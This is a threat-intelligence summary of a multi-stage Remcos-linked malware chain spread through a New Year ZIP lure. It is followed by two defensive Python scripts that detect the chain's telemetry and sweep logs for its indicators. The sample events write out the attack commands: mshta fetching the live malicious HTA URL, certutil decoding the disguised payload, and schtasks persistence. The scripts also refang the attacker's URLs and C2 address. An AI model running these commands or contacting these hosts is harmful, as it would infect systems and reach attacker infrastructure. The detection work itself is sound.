Festive Facade: Dissecting Multi-Stage Malware In New Year-themed Lure – Cyble

CRIL uncovered a New Year-themed multi-stage malware chain that starts with a ZIP hiding a shortcut (LNK) file masquerading as a PNG. The infection flow abuses MSHTA and JavaScript, decodes a payload with certutil, drops a DLL and sideloads it to reach a C2 server potentially tied to Remcos RAT. #Remcos #DLLSideloading #MSHTA

Keypoints

  • CRIL found a ZIP named “happy new year.zip” that contains a shortcut (LNK) file disguised as a PNG image to lure users into opening it.
  • Opening the LNK launches MSHTA, which fetches and runs an HTA file (M.hta) carrying an embedded JavaScript downloader.
  • The downloader retrieves a base64-encoded, certificate-style file disguised as a JPG (wct9D39.jpg), decodes it with certutil into a CAB archive (wct9D39.tmp), and expands the CAB to drop the malware executable.
  • Running that executable drops two binaries that are combined into a DLL (nView.dll); nvTaskBar.exe is then launched and sideloads nView.dll to reach the C2 server.
  • Persistence comes from a scheduled task named “ToSestsc” that runs nvTaskBar.exe with the argument “usea” every 10 minutes.
  • Indicators of compromise include MD5/SHA1/SHA256 hashes for two samples, the two download URLs, and a C2 IP and port (91.245.253.46:443) associated with Remcos.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The malware reaches users as a ZIP attached to New Year-themed spam email. ‘spam emails featuring a New Year theme’ and ‘ZIP attachment contains a shortcut file disguised as a PNG image.’
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – cmd.exe runs the staging commands and launches the dropped executable. ‘cmd.exe is used to run commands such as copy, expand, ping and run the malware executable.’
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA file carries a JavaScript downloader that retrieves the encoded payload. ‘embedded JavaScript function that acts as a downloader, retrieving an encoded payload from a remote server.’
  • [T1053.005] Scheduled Task/Job: Scheduled Task – A scheduled task provides persistence. ‘establishes a scheduled task named “ToSestsc,” set to run every 10 minutes.’
  • [T1036] Masquerading – Two file-type masquerades: the LNK poses as a PNG image and the certificate file as a JPG. ‘LNK file masqueraded as PNG’ and ‘Certificate file masqueraded as JPG.’
  • [T1218.005] System Binary Proxy Execution: Mshta – mshta.exe proxies execution of the malicious JavaScript. ‘abuse mshta.exe to proxy execution of malicious JavaScript.’
  • [T1140] Deobfuscate/Decode Files or Information – certutil -decode turns the base64 “JPG” into the CAB payload. ‘decode the base64 data within the “wct9D39.jpg” file through certutil.’
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – nvTaskBar.exe loads the dropped nView.dll. ‘DLL sideloading to obtain final-stage payload.’
  • [T1071] Application Layer Protocol – The final payload communicates with the C2 server over port 443. ‘Malware exe communicates with C&C server.’
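
Each technique above leaves a host-telemetry footprint a defender can check for. The script below is an added example, not Cyble's code and not taken from the report: it runs simple rules over constructed Sysmon-style process-creation and image-load records modelled on the chain in the Keypoints (remote mshta, certutil -decode of an “image”, expand from a user-writable path, a minute-interval schtasks entry, an EXE loading a DLL from its own user-writable directory) and then correlates hits per process tree, so a lone administrative certutil -decode does not fire. File and task names (M.hta, wct9D39.jpg, wct9D39.tmp, Winp.exe, nView.dll, nvTaskBar.exe, ToSestsc, “usea”) and the HTA URL come from the report; every path, PID and command-line shape is an assumption.

```python
"""Added example (not Cyble's code): rule-based detection of the LNK -> mshta -> certutil -> expand ->
sideload -> schtasks chain over constructed Sysmon-style telemetry.
Event type 1 = process create (pid, ppid, image, cmd); type 7 = image load (pid, image, loaded).
File and task names (M.hta, wct9D39.jpg/.tmp, Winp.exe, nView.dll, nvTaskBar.exe, ToSestsc, "usea")
are taken from the report; every path, PID and command-line shape below is an assumption."""
import re
from collections import defaultdict

USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|users\\public|windows\\temp)\\", re.I)
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp)\b", re.I)

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_mshta_remote(ev):
    # T1218.005: mshta.exe handed an HTTP(S) URL, as the LNK does with M.hta.
    if ev["type"] == 1 and base(ev["image"]) == "mshta.exe" and re.search(r"https?://", ev["cmd"], re.I):
        return "T1218.005 mshta.exe running a remote HTA"

def rule_certutil_decode(ev):
    # T1140, plus T1036 when the input claims to be an image: certutil -decode.
    if ev["type"] == 1 and base(ev["image"]) == "certutil.exe" and re.search(r"-+decode\b", ev["cmd"], re.I):
        tag = "T1140 certutil -decode"
        return tag + " of an image-extension file (T1036)" if IMAGE_EXT.search(ev["cmd"]) else tag

def rule_expand_userdir(ev):
    # T1059.003 batch stage: expand.exe unpacking an archive that sits in a user-writable path.
    if ev["type"] == 1 and base(ev["image"]) == "expand.exe" and USER_WRITABLE.search(ev["cmd"]):
        return "T1059.003 expand.exe extracting from a user-writable path"

def rule_schtasks_minute(ev):
    # T1053.005: minute-interval task whose action lives in a user-writable directory.
    if ev["type"] == 1 and base(ev["image"]) == "schtasks.exe":
        c = ev["cmd"]
        if re.search(r"/create\b", c, re.I) and re.search(r"/sc\s+minute", c, re.I) and USER_WRITABLE.search(c):
            return "T1053.005 schtasks /create with a minute interval"

def rule_sideload(ev):
    # T1574.002: an EXE in a user-writable directory loading a DLL from that same directory.
    if ev["type"] == 7 and USER_WRITABLE.search(ev["image"]) and USER_WRITABLE.search(ev["loaded"]):
        if ev["image"].rsplit("\\", 1)[0].lower() == ev["loaded"].rsplit("\\", 1)[0].lower():
            return f"T1574.002 {base(ev['image'])} sideloading {base(ev['loaded'])}"

RULES = [rule_mshta_remote, rule_certutil_decode, rule_expand_userdir, rule_schtasks_minute, rule_sideload]

def tree_root(events):
    """Return a function mapping any pid to its top-most ancestor among the process-create events."""
    parent = {e["pid"]: e["ppid"] for e in events if e["type"] == 1}
    def root(pid):
        seen = set()
        while pid in parent and parent[pid] in parent and pid not in seen:
            seen.add(pid)
            pid = parent[pid]
        return pid
    return root

def detect(events, min_stages=3):
    """Group rule hits by process tree; keep trees showing at least min_stages distinct techniques."""
    root = tree_root(events)
    hits = defaultdict(list)
    for ev in events:
        for rule in RULES:
            tag = rule(ev)
            if tag:
                hits[root(ev["pid"])].append((ev["pid"], tag))
    return {r: h for r, h in hits.items() if len({t.split()[0] for _, t in h}) >= min_stages}

TEMP = r"C:\Users\victim\AppData\Local\Temp"   # assumed drop directory
SAMPLE_EVENTS = [  # constructed, modelled on the chain in the report
    {"type": 1, "pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": 1, "pid": 2, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe https://mail.chapanakit-rta.com/Queen/M.hta"},
    {"type": 1, "pid": 3, "ppid": 2, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c <batch from M.hta>"},
    {"type": 1, "pid": 4, "ppid": 3, "image": r"C:\Windows\System32\certutil.exe", "cmd": f'certutil -decode "{TEMP}\\wct9D39.jpg" "{TEMP}\\wct9D39.tmp"'},
    {"type": 1, "pid": 5, "ppid": 3, "image": r"C:\Windows\System32\expand.exe", "cmd": f'expand "{TEMP}\\wct9D39.tmp" -F:* "{TEMP}"'},
    {"type": 1, "pid": 6, "ppid": 3, "image": r"C:\Windows\System32\PING.EXE", "cmd": "ping 127.0.0.1 -n 5"},
    {"type": 1, "pid": 7, "ppid": 3, "image": f"{TEMP}\\Winp.exe", "cmd": "Winp.exe"},
    {"type": 1, "pid": 8, "ppid": 7, "image": r"C:\Windows\System32\schtasks.exe", "cmd": f'schtasks /create /tn ToSestsc /sc minute /mo 10 /tr "{TEMP}\\nvTaskBar.exe usea"'},
    {"type": 1, "pid": 9, "ppid": 7, "image": f"{TEMP}\\nvTaskBar.exe", "cmd": "nvTaskBar.exe usea"},
    {"type": 7, "pid": 9, "image": f"{TEMP}\\nvTaskBar.exe", "loaded": f"{TEMP}\\nView.dll"},
]
BENIGN_EVENTS = [  # constructed: an admin decoding a certificate by hand must not be flagged
    {"type": 1, "pid": 20, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"type": 1, "pid": 21, "ppid": 20, "image": r"C:\Windows\System32\certutil.exe", "cmd": r"certutil -decode C:\Users\admin\Documents\ca.b64 C:\Users\admin\Documents\ca.cer"},
]

if __name__ == "__main__":
    for root, tree_hits in detect(SAMPLE_EVENTS).items():
        print(f"suspicious process tree rooted at pid {root}:")
        for pid, tag in tree_hits:
            print(f"  pid {pid}: {tag}")
    print("benign trees flagged:", detect(BENIGN_EVENTS))
```

The per-tree threshold is the point: every individual rule has a benign explanation (certutil decodes certificates, expand unpacks CABs, schtasks creates tasks), but three or more of them inside one lineage descending from mshta.exe is the shape of this campaign and worth an alert. The scheduled-task re-launch of nvTaskBar.exe runs under the Task Scheduler service rather than in this tree, so the sideload rule should also be run on its own at lower severity.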

Indicators of Compromise

  • [Hash] Sample 1 (MD5 / SHA1 / SHA256) – 3551655021b1ac0175d55e73c9c8af2f / d55bc39f385fca3294e45a844f661444d8908988 / 986abd7f0b35386c2babb9fb1c81c3167a1f76bea1dd4c0d8cab5cc0e27798e8
  • [Hash] Sample 2 (MD5 / SHA1 / SHA256) – 99a10c546b13d3efd945c574ed4e10a4 / 884a2351f5c41a26a351a6d8ca5ddb84ce6130a8 / b467fb098af61e4187a24447ba62c1565e354d989c8a9860106a574a81114738
  • [URL] HTA and certificate download links – hxxps[:]//mail[.]chapanakit-rta[.]com/Queen/M[.]hta, hxxps[:]//mail[.]chapanakit-rta[.]com/pt/wct9D39.jpg
  • [IP] IP address and port for C2 – 91[.]245[.]253[.]46:443
  • [File] Key artifacts – happy new year.zip, happy new year.lnk, M.hta, wct9D39.jpg (base64-encoded PEM-style certificate file), wct9D39.tmp (CAB file), Winp.exe, nView.dll, NVDriverSearch.ct
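
The network indicators above are published defanged (hxxps, [.], [:]) and have to be refanged before they can be matched against anything. The script below is an added example, not Cyble's code: it refangs the report's two URLs and the C2 ip:port, derives a host-level indicator from the URLs so that a fetch of an unlisted path from the same host is still surfaced, and sweeps constructed proxy and firewall log lines for exact-URL, host and C2 hits. The indicator values are the report's; the log formats and sample lines are constructed.

```python
"""Added example (not Cyble's code): refang the report's network IOCs and sweep log lines for them.
Indicator values come from the report; the log line formats and the sample lines are constructed."""
import re
from urllib.parse import urlparse

# Defanged exactly as published, so the list stays safe to paste around; refang() makes it matchable.
DEFANGED_URLS = [
    "hxxps[:]//mail[.]chapanakit-rta[.]com/Queen/M[.]hta",
    "hxxps[:]//mail[.]chapanakit-rta[.]com/pt/wct9D39.jpg",
]
DEFANGED_C2 = ["91[.]245[.]253[.]46:443"]

def refang(s):
    """Undo the usual defanging: hxxp(s) -> http(s); [.] (.) [dot] -> . ; [:] -> : ."""
    s = re.sub(r"^hxx(?=ps?)", "htt", s, flags=re.I)
    for bad, good in (("[.]", "."), ("(.)", "."), ("[dot]", "."), ("[:]", ":")):
        s = s.replace(bad, good)
    return s

def build_indicators():
    """Exact URLs, the hosts they live on (host-level catches unlisted paths), and C2 ip:port pairs."""
    urls = {refang(u) for u in DEFANGED_URLS}
    hosts = {urlparse(u).hostname for u in urls}          # .hostname is already lowercased
    return urls, hosts, {refang(c) for c in DEFANGED_C2}

URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)
IPPORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")                 # e.g. 91.245.253.46:443
KV_DST_RE = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})\b.*?\bdpt=(\d{1,5})\b", re.I)  # iptables-style DST=/DPT=

def scan(lines):
    """Return (line_no, kind, indicator) for each hit; kind is 'url', 'host' or 'c2'."""
    urls, hosts, c2 = build_indicators()
    hits = []
    for n, line in enumerate(lines, 1):
        for raw in URL_RE.findall(line):
            u = raw.rstrip(".,;)")                       # strip trailing punctuation from free text
            host = urlparse(u).hostname
            if u in urls:
                hits.append((n, "url", u))
            elif host in hosts:
                hits.append((n, "host", host))
        for ip, port in IPPORT_RE.findall(line) + KV_DST_RE.findall(line):
            if f"{ip}:{port}" in c2:
                hits.append((n, "c2", f"{ip}:{port}"))
    return hits

SAMPLE_LOGS = [  # constructed lines: Squid-style proxy access log and an iptables-style firewall log
    "1704067200.101 312 10.10.4.21 TCP_MISS/200 2310 GET https://mail.chapanakit-rta.com/Queen/M.hta - HIER_DIRECT/91.245.253.46 text/html",
    "1704067201.455 120 10.10.4.21 TCP_MISS/200 48810 GET https://mail.chapanakit-rta.com/pt/other.jpg - HIER_DIRECT/91.245.253.46 image/jpeg",
    "Jan  1 00:00:05 gw kernel: IN=eth1 OUT=eth0 SRC=10.10.4.21 DST=91.245.253.46 PROTO=TCP SPT=51022 DPT=443",
    "1704067210.000 20 10.10.4.22 TCP_MISS/200 512 GET https://www.example.com/index.html - HIER_DIRECT/93.184.216.34 text/html",
]

if __name__ == "__main__":
    for n, kind, ioc in scan(SAMPLE_LOGS):
        print(f"line {n}: {kind} match on {ioc}")
```

The C2 is matched on ip:port rather than the bare address because the report gives the indicator as a pair; a bare 91.245.253.46 seen on another port is worth a look but is a weaker signal, so it is left to the analyst rather than folded into the same alert.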

Read more: https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/